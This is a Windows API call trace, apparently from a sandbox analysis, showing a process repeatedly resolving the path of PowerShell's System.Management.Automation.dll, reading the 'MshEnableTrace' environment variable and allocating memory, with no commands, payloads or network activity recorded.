	[0227.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.484] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0228.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.484] CoTaskMemFree (pv=0x4bdf80) 
	[0228.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0242.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0242.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0242.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0242.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0242.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0242.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0242.526] VirtualQuery (in: lpAddress=0x29b8a0, lpBuffer=0x29c760, dwLength=0x30 | out: lpBuffer=0x29c760*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0242.531] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0242.531] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0242.531] CoTaskMemFree (pv=0x4bdf80) 
	[0243.200] VirtualQuery (in: lpAddress=0x29b8a0, lpBuffer=0x29c760, dwLength=0x30 | out: lpBuffer=0x29c760*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0243.220] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0243.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0243.221] CoTaskMemFree (pv=0x4bdf80) 
	[0243.224] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0243.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0243.224] CoTaskMemFree (pv=0x4bdf80) 
	[0243.226] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0243.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0243.226] CoTaskMemFree (pv=0x4bdf80) 
	[0243.234] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0243.234] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0243.234] CoTaskMemFree (pv=0x4bdf80) 
	[0243.725] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0243.725] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0243.725] CoTaskMemFree (pv=0x4bdf80) 
	[0243.726] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0243.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0243.727] CoTaskMemFree (pv=0x4bdf80) 
